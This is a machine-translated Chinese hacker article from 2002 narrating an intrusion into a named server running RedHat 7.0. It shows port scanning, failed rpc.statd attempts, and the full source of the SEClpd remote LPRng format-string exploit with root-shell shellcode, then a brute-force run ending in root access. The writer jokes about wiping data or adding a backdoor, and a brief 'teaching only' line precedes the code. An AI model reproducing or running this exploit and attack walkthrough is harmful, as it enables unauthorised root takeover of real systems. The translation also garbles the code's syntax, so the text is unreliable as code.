RedHat Linux 7.0 invades |http://www.cshu.net




                               About us 
                               Commercial cooperation 
                               Copyright declaration 
                               Contacts with us 



            Returns to the home pageArticle browsingOther columnsLands the forum


            |   The absolute &#21019;   |   |   hacker file   |   |   is newest 
            dynamically   |   
                  |  The hacker file>>invasion analyzes>>RedHat the Linux 7.0 
                  invasions  Printing

            RedHat Linux 7.0 invasions 
            Www.cshu.net  2002-8-18  fog rain village 

              RedHat Linux 7.0 invasions closure window 

              Downloading: Http://210.77.146.151/images/hlc/files/seclpd.c
              RedHat Linux 7.0 invasions
              I write this article the goal not to lie in teach the person to 
              invade, but is for enhance own technology and strengthens network 
              administrator's safe guard consciousness. Only this! The careless 
              network administrator should understand that, Because a you small 
              operation fault possibly can cause the entire network 
              comprehensively to fall to the enemy! This article mainly is 
              revolves under UNIX a small service advancement (LPD: Network 
              printing service) the attack carries on.
              Let my slowly road come... ..
              Coughs... Coughs... First serves tea to me! (What? ! Does not 
              have? I did not say! !) Ha-ha... ... Cracks a joke, return to the 
              proper topic First sets a target, casually looks for a Taiwan 
              search engine. Casually selects! The supposition is: 
              Www.fbi.gov.tw. ^__^
              First lets me have a look is not continually on:
              C:\ping www.fbi.gov.tw 
              Pinging www.fbi.gov.tw [ 202.106.184.200 ] with 32 bytes of data:
              Reply from 202.106.184.200: Bytes=32 time=541ms TTL=244
              Reply from 202.106.184.200: Bytes=32 time=620ms TTL=244
              Reply from 202.106.184.200: Bytes=32 time=651ms TTL=244
              Reply from 202.106.184.200: Bytes=32 time=511ms TTL=244
              Ping statistics for 202.106.184.200:
              Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
              Approximate round trip times in milli-seconds:
              Minimum = 511ms, Maximum = 651ms, Average = 580ms
              Hee hee not only on, the speed also is continually good... ...
              First telnet has a look banner:
              C:\ "gt; Telnet www.fbi.gov.tw
              Loses to the main engine connection.
              Ha ha... ... Looked like fell the telnet service to shut! Again 
              tries ftp
              C:\ "gt; Ftp www.fbi.gov.tw
              Connected to www.fbi.gov.tw.
              User (www.fbi.gov.tw: (none)):
              Hey ~~wu-2.6.1 looked like a little the feature. This machine 
              picture is famous... ... ... ... Right! RedHat7.0! Has not been 
              wrong is she! First must confirm, including on my springboard:
              C:\ "gt; Telnet xxx.xxx.xxx.xxx
              Red Hat Linux release 7.0 (Guinness)
              Kernel 2.2.16-22smp on an i686
              Login: Fetdog
              Password:
              Bash-2.04$
              Ha-ha ~~ this is I in a Taiwan's springboard. RH7 oh! Under and so 
              on I can tell you to take these meat chicken means... ... Takes 
              the nmap scanner, has a look mysterious ~~~
              Bash-2.04$nmap -sT -O www.fbi.gov.tw
              Starting nmap V. 2.54BETA7 (www.insecure.org/nmap/)
              WARNING! The following files exist and are readable: 
/usr/local/sha
              -services and. /nmap-services. I am choosing 
/usr/local/share/nmap/
              S for security reasons. set NMAPDIR=. to give priority to files in
              Irectory
              Interesting ports on (www.fbi.gov.tw):
              (The 1,520 ports scanned but not shown below are in state: Closed)
              Port State Service
              TCP Sequence Prediction: Class=random positive increments
              Difficulty=3247917 (Good luck!)
              Remote operating system guess: Linux 2.1.122 - 2.2.16
              Nmap run completed -- 1 IP address (1 host up) scanned in 9 
seconds
              Exactly! ! Opens the port very are also many! Good... ... Good... 
              ... . 79/tcp finger? Ha-ha ~ first has a look this, but linux does 
              not have the finger user to tabulate this loophole, no matter its 
              I first have a look to have the bad luck ghost.
              Bash-2.04$finger @www.fbi.gov.tw
              [ www.fbi.gov.tw ]
              No one logged on.
              Shit! How meets nobody! Opens the gate! Opens the gate to me! : 
              (... ... Again has a look 111/tcp sunrpc. Heh heh... ... Recently 
              the rpc loophole is in fashion, did not know RH7 this east Donghoi 
              cannot have? Manages it, first has a look to say again!
              Bash-2.04$rpcinfo -p www.fbi.gov.tw
              Program vers proto port service
              Looked like has the rpc.statd service. Waits for me to have a look 
              to be able the long-distance overflow to take rootshell. Ha ha! 
              This rpc.statd long-distance overflow is I found in hack.co.za. 
              Waits for me first to have a look the help. Hee hee ~~
              Bash-2.04$. /statdx -h
              Statdx by ron1n 
              Usage: Stat [ -t ] [ -p port ] [ -a addr ] [ -l len ]
              [ -o offset ] [ -w num ] [ -s secs ] [ -d type ] 
              -t attack a tcp dispatcher [ udp ]
              -p rpc.statd serves requests on [ query ]
              -a the stack address of the buffer is 
              -l the length of the buffer is [ 1,024 ]
              -o the offset to return to is [ 600 ]
              -w the number of dwords to wipe is [ 9 ]
              -s set timeout in seconds to [ 5 ]
              -d use a hardcoded 
              Available types:
              Looked like certainly does not support RH7. How manages? ? Let me 
              0-2 completely try to look again said! Start... ...
              Bash-2.04$stat -d 0 www.fbi.gov.tw
              Buffer: 0xbffff314 length: 999 (str/ nul)
              Target: 0xbffff718 new: 0xbffff56c (offset: 600)
              Wiping 9 dwords
              Failed - statd returned res_stat: (failure) state: 21 
              Ha ha receives the setback, again tries... ...
              Bash-2.04$stat -d 1 www.fbi.gov.tw
              Buffer: 0xbffff314 length: 999 (str/ nul)
              Target: 0xbffff718 new: 0xbffff56c (offset: 600)
              Wiping 9 dwords
              Failed - statd returned res_stat: (failure) state: 21
              Same! Continuation... ...
              Bash-2.04$stat -d 1 www.fbi.gov.tw
              Buffer: 0xbffff314 length: 999 (str/ nul)
              Target: 0xbffff718 new: 0xbffff56c (offset: 600)
              Wiping 9 dwords
              Failed - statd returned res_stat: (failure) state: 21
              I roast! ! Roasts! Rpc.statd invalid! Let me thought looked... ... 
              RH7 should have a long-distance overflow... ... Looks like is the 
              lp service creates. Let me look looked. Ha ha ~~ had found... ... 
              "seclpd.c" should be east this east. Below the procedure also may 
              in black pledge downloading.

              below the code only supplies the teaching use, can use for in 
              no way to carry on the malicious attack 
              /*
              * Welcome to http://hlc.cnroot.com/
              * Run: . /SEClpd victim brute -t type 
              * Try first. /SEClpd victim -t 0 then try the brute. 
              */

              Char shellcode [ ] = 
              "quot; \x31\xdb\x31\xc9\x31\xc0\xb0\x46\xcd\x80 "quot;
              "quot; 
              \x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8 
              "quot;
              "quot; 
              \x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89 
              "quot;
              "quot; 
              \x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0 
              "quot;
              "quot; 
              \x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd 
              "quot;
              "quot; 
              \x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9 
              "quot;
              "quot; 
              \xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75 
              "quot;
              "quot; 
              \x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08 
              "quot;
              "quot; \x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh "quot; ;
              Struct target
              {
              Char *os_name;
              U_long eip_address;
              U_long shellcode_address;
              Unsigned int position;
              Int written_bytes;
              Int align;
              };
              Struct target targets [ ] =
              {
              {"quot; RedHat 7.0 - Guinesss "quot; 0xbffff3ec, 0L, 300, 70, 2,},
              {"quot; RedHat 7.0 - Guinesss-dev "quot; 0xbffff12c, 0L, 300, 70, 
              2,},
              {NULL, 0L, 0L, 0, 0, 0}
              };
              Static char address_buffer [ ADDRESS_BUFFER_SIZE 1 ];
              Static char append_buffer [ APPEND_BUFFER_SIZE 1 ];
              Static char shellcode_buffer [ 1,024 ];
              Static char *hostname=NULL;
              Static int offset;
              Static struct hostent *he;
              Int type=-1;
              Int brute=-1, failure=1;
              Void calculate_rets (u_long eip_addr, u_long shellcode_addr, u_int 
              previous, u_int addr_loc)
              {
              Int i;
              Unsigned int tmp = 0;
              Unsigned int copied = previous;
              Unsigned int num [ 4 ] =
              {
              (unsigned int) (shellcode_addr "amp; 0x000000ff),
              (unsigned int) ((shellcode_addr "amp; 0x0000ff00)"gt;" T; 8),
              (unsigned int) ((shellcode_addr "amp; 0x00ff0000)"gt;" T; 16),
              (unsigned int) ((shellcode_addr "amp; 0xff000000)"gt;" T; 24)
              };
              Memset (address_buffer, '\0', sizeof (address_buffer));
              Memset (append_buffer, '\0', sizeof (append_buffer));
              For (i = 0; I "lt; 4; I)
              {
              While (copied "gt; 0x100)
              Copied -= 0x100;
              If ((i "gt; 0)"amp;" Mp; (num [ i-1 ] == num [ i ]))
              Sprintf (append_buffer strlen (append_buffer), "quot; %%%d$n 
              "quot; Addr_loc i);
              Else if (copied "lt; Num [ i ])
              {
              If ((num [ i ] - copied)"lt; = 10)
              {
              Sprintf (append_buffer strlen (append_buffer), "quot; %. *s "quot;
              (int) (num [ i ] - copied), "quot; Security.is!" Uot;)
              Copied = (num [ i ] - copied);
              Sprintf (append_buffer strlen (append_buffer), "quot; %%%d$n 
              "quot; Addr_loc i); } else {
              Sprintf (append_buffer strlen (append_buffer), "quot; %%. %du 
              "quot;
              Num [ i ] - copied);
              Copied = (num [ i ] - copied);
              Sprintf (append_buffer strlen (append_buffer), "quot; %%%d$n 
              "quot; Addr_loc i); }
              } else {
              Tmp = ((num [ i ] 0x100) - copied);
              Sprintf (append_buffer strlen (append_buffer), "quot; %%. %du 
              "quot; Tmp);
              Copied = ((num [ i ] 0x100) - copied);
              Sprintf (append_buffer strlen (append_buffer), "quot; %%%d$n 
              "quot; Addr_loc i);
              }
              Sprintf (address_buffer strlen (address_buffer), "quot; %c%c%c%c 
              "quot;
              (unsigned char) ((eip_addr i)"amp; 0x000000ff),
              (unsigned char) (((eip_addr i)"amp; 0x0000ff00)"gt;" T; 8),
              (unsigned char) (((eip_addr i)"amp; 0x00ff0000)"gt;" T; 16),
              (unsigned char) (((eip_addr i)"amp; 0xff000000)"gt;" T; 24));
              }
              While (strlen (address_buffer)"lt; ADDRESS_BUFFER_SIZE)
              Strcat (address_buffer, "quot; X "quot;)
              Printf ("quot; \nGeneration complete:\nAddress: "quot;)
              For (i = 0; I "lt; Strlen (address_buffer); I)
              {
              If (((i % 4) == 0)"amp;" Mp; (i "gt; 0))
              Printf ("quot; . " Uot;)
              Printf ("quot; x "quot; (unsigned char) address_buffer [ i ]);
              }
              Printf ("quot; \nAppend: %s\n "quot; Append_buffer);

              Return;
              }
              Char *create_malicious_string (void)
              {
              Static char format_buffer [ FORMAT_LENGTH 1 ];
              Long addr1, addr2;
              Int i;
              Memset (format_buffer, '\0', sizeof (format_buffer));
              Targets [ type ] shellcode_address = targets [ type ] eip_address 
              SHELLCODE_COUNT;
              Addr1 = targets [ type ] eip_address;
              Addr2 = targets [ type ] shellcode_address;
              Calculate_rets (addr1, addr2, targets [ type ] written_bytes, 
              targets [ type ] position);
              (void) snprintf (format_buffer, sizeof (format_buffer) -1, "quot; 
              %. *s%s "quot;
              Targets [ type ] align, "quot; BBBB "quot; Address_buffer);
              Strncpy (address_buffer, format_buffer, sizeof (address_buffer) 
              -1);
              Strncpy (format_buffer, append_buffer, sizeof (format_buffer) -1);
              For (i = 0; I "lt; NOPCOUNT; I) 
              Strcat (format_buffer, "quot; \x90 "quot;)
              Strcat (format_buffer, shellcode);
              Return (format_buffer);
              }
              Int connect_victim ()
              {
              Int sockfd, n;
              Struct sockaddr_in s;
              Fd_set fd_stat;
              Char buff [ 1,024 ]; 
              Static char testcmd [ 256 ] = "quot; /bin/uname -a; Id; \r\n 
              "quot; ;
              S.sin_family = AF_INET;
              S.sin_port = htons (3,879);
              S.sin_addr.s_addr = * (u_long *) he- "gt; H_addr;

              If ((sockfd = socket (AF_INET, SOCK_STREAM, 0))"lt; 0)
              {
              Printf ("quot; --- [ 5 ] Unable to create socket! \n "quot;)
              Printf ("quot; Exploit failed! \n "quot;)
              Return -1;
              }
              If ((connect (sockfd, (struct sockaddr *)"amp; S, sizeof (s)))"lt; 
              0)
              {
              Return -1;
              }
              If (brute)
              Printf ("quot; The eip_address is 0x%x\n\n "quot; Targets [ type ] 
              eip_address);
              Printf ("quot; - [ ] shell located on %s\n "quot; Hostname);
              Printf ("quot; - [ ] Enter Commands at will\n\n "quot;)
              Failure = -1;
              FD_ZERO ("amp; Fd_stat);
              FD_SET (sockfd, "amp; Fd_stat);
              Send (sockfd, testcmd, strlen (testcmd), 0);
              While (1) {
              FD_SET (sockfd, "amp; Fd_stat);
              FD_SET (0, "amp; Fd_stat);
              If (select (sockfd 1, "amp; Fd_stat, NULL, NULL, NULL)"lt; 0) 
              break;
              If (FD_ISSET (sockfd, "amp; Fd_stat)) {
              If ((n=read (sockfd, buff, sizeof (buff)))"lt; 0) {
              Fprintf (stderr, "quot; EOF\n "quot;)
              Return 2;
              }
              If (write (1, buff, n)"lt; 0) break;
              }
              If (FD_ISSET (0, "amp; Fd_stat)) {
              If ((n=read (0, buff, sizeof (buff)))"lt; 0) {
              Fprintf (stderr, "quot; EOF\n "quot;)
              Return 2;
              }
              If (send (sockfd, buff, n,0)"lt; 0) break;
              }
              }
              }

              Void send_code (char *exploit_buffer)
              {
              Int sockfd, n;
              Struct sockaddr_in s;
              Fd_set fd_stat;
              Char recv [ 1,024 ];
              Static char testcmd [ 256 ] = "quot; /bin/uname -a; Id; \r\n 
              "quot; ;
              S.sin_family = AF_INET;
              S.sin_port = htons (515);
              S.sin_addr.s_addr = * (u_long *) he- "gt; H_addr;

              If ((sockfd = socket (AF_INET, SOCK_STREAM, 0))"lt; 0)
              {
              Printf ("quot; --- [ 5 ] Unable to create socket! \n "quot;)
              Printf ("quot; Exploit failed! \n "quot;)
              Exit (-1);
              }
              If ((connect (sockfd, (struct sockaddr *)"amp; S, sizeof (s)))"lt; 
              0)
              {
              Printf ("quot; --- [ 5 ] Unable to connect to %s\n "quot; 
              Hostname);
              Printf ("quot; Exploit failed, %s is not running LPD! \n "quot; 
              Hostname);
              Exit (-1);
              }

              Usleep (DELAY);
              If (write (sockfd, exploit_buffer, strlen (exploit_buffer))"lt; 0)
              {
              Printf ("quot; Couldn't write to socket %d "quot; Sockfd);
              Printf ("quot; Exploit failed\n "quot;)
              Exit (2);
              }
              Close (sockfd);
              Connect_victim ();
              }
              Void usage (char *program)
              {
              Int i=0;
              Printf ("quot; SEClpd by DiGiT of ADM/security.is! \n\n "quot;)
              Printf ("quot; Usage: %s victim [ \ "quot; Brute\ "quot; ] -t type 
              [ -o offset ] [ -a align ] [ -p position ] [ -r eip_addr ] [ -c 
              shell_addr ] [ -w written_bytes ] \n\n "quot; Program);
              Printf ("quot; Ie: . /SEClpd localhost -t 0 For most redhat 7.0 
              boxes\n "quot;)
              Printf ("quot; Ie: . /SEClpd localhost brute -t 0 For brute 
              forcing all redhat 7.0 boxes\n "quot;)
              Printf ("quot; Types:\n\n "quot;)
              While (targets [ i ] os_name! = NULL)
              Printf ("quot; [ Type %d: [ %s ] \n "quot; I, targets [ i ] 
              os_name);
              }
              Int main (int argc, char **argv)
              {
              Char exploit_buffer [ 1,024 ];
              Char *format = NULL;
              Int c, brutecount=0;

              If (argc "lt; 3)
              {
              Usage (argv [ 0 ]);
              Return 1;
              }
              Hostname = argv [ 1 ];
              If (! Strncmp (argv [ 2 ], "quot; Brute "quot; 5)) brute = 1;

              While ((c = getopt (argc, argv, "quot; T:r:c:a:o:p:w:k "quot;) ! = 
              EOF) {
              Switch (c)
              {
              Case 't':
              Type = atoi (optarg);
              Break;
              Case 'r':
              Targets [ type ] eip_address = strtoul (optarg, NULL, 16);
              Break;
              Case 'c':
              Targets [ type ] shellcode_address = strtoul (optarg, NULL, 16);
              Break;
              Case 'a':
              Targets [ type ] align = atoi (optarg);
              Break;
              Case 'o':
              Offset = atoi (optarg);
              Break;
              Case 'p':
              Targets [ type ] position = atoi (optarg);
              Break;
              Case 'w':
              Targets [ type ] written_bytes = atoi (optarg);
              Break;
              Default:
              Usage (argv [ 0 ]);
              Return 1;
              }
              }
              If (type "lt; 0) 
              {
              Printf ("quot; You must specify a type! \n "quot;)
              Printf ("quot; Example: . /SEClpd victim -t 0\n "quot;)
              Return -1;
              }
              If ((he = gethostbyname (hostname)) == NULL)
              {
              Herror ("quot; Gethostbyname "quot;)
              Exit (1);
              }
              Targets [ type ] shellcode_address = targets [ type ] eip_address 
              SHELLCODE_COUNT;

              Printf ("quot; Security.is remote exploit for LPRng/lpd by 
              DiGiT\n\n "quot;) 
              Printf ("quot; Exploit information\n "quot;)
              Printf ("quot; Victim: %s\n "quot; Hostname);
              Printf ("quot; Type: %d - %s\n "quot; Type, targets [ type ] 
              os_name); 
              Printf ("quot; Eip address: 0x%x\n "quot; Targets [ type ] 
              eip_address); 
              Printf ("quot; Shellcode address: 0x%x\n "quot; Targets [ type ] 
              shellcode_address); 
              Printf ("quot; Position: %d\n "quot; Targets [ type ] position);
              Printf ("quot; Alignment: %d\n "quot; Targets [ type ] align);
              Printf ("quot; Offset %d\n "quot; Offset);
              Printf ("quot; \n "quot;)
              Printf ("quot; Attacking %s with our format string\n "quot; 
              Hostname);
              If (brute "gt; 0)
              {
              Printf ("quot; Brute force man, relax and enjoy the ride;" T; \n 
              "quot;)
              Targets [ type ] eip_address = 0xbffffff0;
              While (failure) 
              {
              Memset (exploit_buffer, '\0', sizeof (exploit_buffer)); 
              Format = create_malicious_string ();
              Strcpy (exploit_buffer, address_buffer);
              Strcat (exploit_buffer, format);
              Strcat (exploit_buffer, "quot; \n "quot;)
              Send_code (exploit_buffer);
              Targets [ type ] eip_address = 0xbffffff0 - offset;
              Offset =4;
              If (offset "gt; OFFSET_LIMIT) {
              Printf ("quot; Offset limit hit, ending brute mode;" T; \n "quot;)
              Return -1;
              }
              }
              }

              Else
              Format = create_malicious_string ();
              Strcpy (exploit_buffer, address_buffer);
              Strcat (exploit_buffer, format);
              Strcat (exploit_buffer, "quot; \n "quot;)
              Send_code (exploit_buffer);
              Printf ("quot; Argh exploit failed$#%! Try brute force! \n "quot;) 

              Return (-1);
              }
              
              Passes on the springboard the code. Carries on the translation 
              with gcc... ...
              Bash-2.04$gcc -o seclpd seclpd.c mmm... ... Pass~ lets me have a 
              look the explanation first.
              Bash-2.04$. /seclpd
              SEClpd by DiGiT of ADM/security.is!
              Usage: Seclpd victim [ "quot; Brute "quot; ] -t type [ -o offset ] 
              [ -a align ] [ -p position ] 
              [ -r eip_addr ] [ -c shell_addr ] [ -w written_bytes ]
              Ie: . /SEClpd localhost -t 0 For most redhat 7.0 boxes
              Ie: . /SEClpd localhost brute -t 0 For brute forcing all redhat 
              7.0 boxes
              Types:
              [ Type 0: [ RedHat 7.0 - Guinesss ]
              [ Type 1: [ RedHat 7.0 - Guinesss-dev ]
              Looked like was this. Has not been wrong... ... Wow... ... Starts 
              hack!
              Bash-2.04$. /seclpd www.fbi.gov.tw -t 0
              Security.is remote exploit for LPRng/lpd by DiGiT
              Exploit information
              Victim: Www.fbi.gov.tw
              Type: 0 - RedHat 7.0 - Guinesss
              Eip address: 0xbffff3ec
              Shellcode address: 0xbffff7f2
              Position: 300
              Alignment: 2
              Offset 0
              Attacking www.fbi.gov.tw with our format string
              Argh exploit failed$#%! Try brute force!
              Grandfather! Also is failed... ... Roasts! ! Continues to try... 
              ...
              Bash-2.04$. /seclpd www.fbi.gov.tw -t 1
              Security.is remote exploit for LPRng/lpd by DiGiT
              Exploit information
              Victim: Www.fbi.gov.tw
              Type: 1 - RedHat 7.0 - Guinesss-dev
              Eip address: 0xbffff12c
              Shellcode address: 0xbffff532
              Position: 300
              Alignment: 2
              Offset 0
              Attacking www.fbi.gov.tw with our format string
              Argh exploit failed$#%! Try brute force!
              Looked like certainly had to come brute! Continuation... ... 
              Continuation... ...
              Bash-2.04$. /seclpd www.fbi.gov.tw brute -t 0
              Security.is remote exploit for LPRng/lpd by DiGiT
              Exploit information
              Victim: Www.fbi.gov.tw
              Type: 0 - RedHat 7.0 - Guinesss
              Eip address: 0xbffff3ec
              Shellcode address: 0xbffff7f2
              Position: 300
              Alignment: 2
              Offset 0
              Attacking www.fbi.gov.tw with our format string
              Brute force man, relax and enjoy the ride;" T;
              Ha ha the ~~brute violence explains. Looked you do not leave 
              shell! Now must wait for on a while... ... Soaks cup coffee 
              slowly. (Any! Does not have coffee? Tea! This is also good!) ... 
              ... ... ... Crossed about cup of coffee time. Also is about 5-8 
              minute, could have the result. (Any! Any! 5-8 minute you have 
              drunk 5 cups! My but actually ~~~)... ... Came out. Ha ha ~~
              - [ ] shell located on www.fbi.gov.tw
              - [ ] Enter Commands at will
              Linux FBI.WWW 2.2.16-22smp #1 SMP Tue Aug 22 16:39:21 EDT 2,000 
              i686 unknown
              Uid=0 (root) gid=7 (lp)
              Well... ... Ha ha ~uid=0 (root) ha ha ha ha ha... ... ... ... 
              First in you is root! Was allowed to act in a self-serving manner 
              ~~ completely to delete its thing ~~ ha ha... ... Too went too far 
              ~~ or to calculate in a passwd China and Canada back door how ~~ 
              as for did add, this not in this article scope... ... ^___^
              Good Luck... ... ... ... ... ...

              Written By GoGo from H.L.C
              /* China black pledge all rights reserved, the reprint please give 
              the source! Http://hlc.cnroot.com*/


              Original author: Chinese black pledge 
              Origin: Http://hlc.cnroot.com 
              Altogether has 89 readers to read this article 

              [Tells friend] 
            Previous article:The common hacker invades several commonly used 
            orders which needs! ~ 

            Next article:The hacker dryly stares the double magnetic head hardly 
            to take inventory the homepage to be able to look cannot change 

            - this week popular article - related article 
            Microsoft safely announced that, Ms03-009 (MS, patch) 
            Samba SMB/CIFS package of lamination reorganization long-distance 
            buffer overflow loophole
            Microsoft Windows PostMessage API exposition password loophole
            Microsoft Windows help system CNT document: Link long-distance 
            buffer overflow loophole
            Kernel has many flaws (Linux, patch)
            OpenPKG has the dense spoon revelation flaw (Linux, patch) 
            How scratches buttocks ----nt and UINX the system LOG diary article 



      CSHU 
